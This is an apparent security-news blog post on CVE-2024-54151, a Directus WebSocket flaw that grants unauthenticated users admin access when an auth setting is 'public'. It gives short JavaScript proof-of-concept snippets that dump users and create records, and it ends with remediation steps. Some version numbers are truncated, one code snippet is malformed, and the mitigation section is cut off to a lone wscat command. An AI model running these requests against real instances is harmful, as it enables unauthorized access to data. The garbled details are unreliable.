CVE CyberSecurity Database News

CVE-2024-54151 - Critical Directus WebSockets Vulnerability—How Unauthenticated Users Can Become Admins

Poster -

Directus is a popular open-source platform that turns any SQL database into a powerful real-time API and user-friendly admin dashboard. With Directus, teams can manage content in MySQL, PostgreSQL, and other SQL databases without writing a single line of SQL code. Its flexibility and modern design have made it a favorite for many developers and companies worldwide.

But as with any fast-moving software, vulnerabilities can slip through the cracks. CVE-2024-54151 is a prime example—this critical flaw allows anyone, even without authentication, to take full admin actions via WebSockets if certain settings are misconfigured. Let’s break it down in simple terms, show you exactly what went wrong, and help you check if you’re at risk.

What is CVE-2024-54151?

This high-severity vulnerability affects Directus versions 11.. up to (but not including) 11.3.. The root of the problem is simple: when the environment variables WEBSOCKETS_GRAPHQL_AUTH or WEBSOCKETS_REST_AUTH are set to "public", any WebSocket connection provides administrative access. That means unauthenticated visitors can read, write, update, delete, and subscribe to real-time changes in your data—as if they owned the place.

WEBSOCKETS_REST_AUTH

If either is set to public, Directus drops all permission checks for WebSocket requests. This is not meant for production but can be tempting for testing or early deployment.

How the Exploit Works (With Code Example)

Let’s put this in real-world terms. Imagine you’re running a business site on Directus and, for performance or testing, you launch with the following in your .env file:

WEBSOCKETS_GRAPHQL_AUTH=public

*(or)*

WEBSOCKETS_REST_AUTH=public

Now, an attacker can open a WebSocket connection and perform any action, like listing all users or deleting content, without logging in.

1. Exploiting via GraphQL WebSocket

Let’s say your Directus app is running at wss://yourdomain.com/websocket. An attacker can use plain JavaScript or a tool like wscat to connect:

const socket = new WebSocket('wss://yourdomain.com/websocket');

socket.onopen = () => {
  // Send a message that queries all users
  socket.send(JSON.stringify({
    id: 1,
    type: 'graphql',
    payload: {
      query: query { users { id email role } }
    }
  }));
};

socket.onmessage = (event) => {
  console.log('Received:', event.data);
};

With this, they get the full user list, including emails and roles—no password needed!

Or, the attacker can create a new item in a collection, say posts, without any auth token

const socket = new WebSocket('wss://yourdomain.com/websocket');

socket.onopen = () => {
  socket.send(JSON.stringify({
    id: 2,
    type: 'rest',
    payload: {
      method: 'POST',
      path: '/items/posts',
      data: {
        title: "I’m an attacker!",
        content: "This was created without authorization."
      }
    }
  }));
};

socket.onmessage = (event) => {
  console.log('Received:', event.data);
};

Attackers can do anything: modify or delete collections, create admin users, subscribe to data changes, and more.

Why is This So Dangerous?

- Zero authentication required: No login, no password, no token. Anyone can connect and take admin actions.

All CRUD operations: Create, read, update, and delete across all user collections.

- Bypasses all permissions: Even if your Directus roles are perfectly configured, this setting nullifies them for WebSocket traffic.

Who is Affected?

Anyone using Directus 11.. to 11.2.x, IF either WEBSOCKETS_GRAPHQL_AUTH or WEBSOCKETS_REST_AUTH is set to public or left accessible without proper privileges.

How to Fix It

Update Immediately to v11.3.+
Directus maintainers released version 11.3. that fixes this issue by tightening permission checks around WebSocket connections.

> Upgrade Guide:

> 1. Update your Directus instance

>

>     npm install directus@latest
>     # or update your Docker image
>     docker pull directus/directus:latest
>

> 2. Remove or change any WEBSOCKETS_GRAPHQL_AUTH=public or WEBSOCKETS_REST_AUTH=public settings in your environment file.
> 3. Restart your application.

If you cannot upgrade:

`bash

npx wscat -c ws://yourdomain.com/websocket

References and Resources

- Directus Security Advisory for CVE-2024-54151
- Directus Release Notes v11.3.
- Directus Documentation - Environment Variables
- NIST CVE entry for CVE-2024-54151

Summary

CVE-2024-54151 is a dangerous "simple misconfiguration, total compromise" type of bug. By setting a single .env property to public, you open your entire Directus instance—even your user data and configuration—to the world. If you use Directus 11, upgrade to 11.3. or later right now and check your environment settings. Protect your data, your reputation, and your users.

Timeline

Published on: 12/09/2024 21:15:08 UTC
Last modified on: 12/10/2024 18:15:42 UTC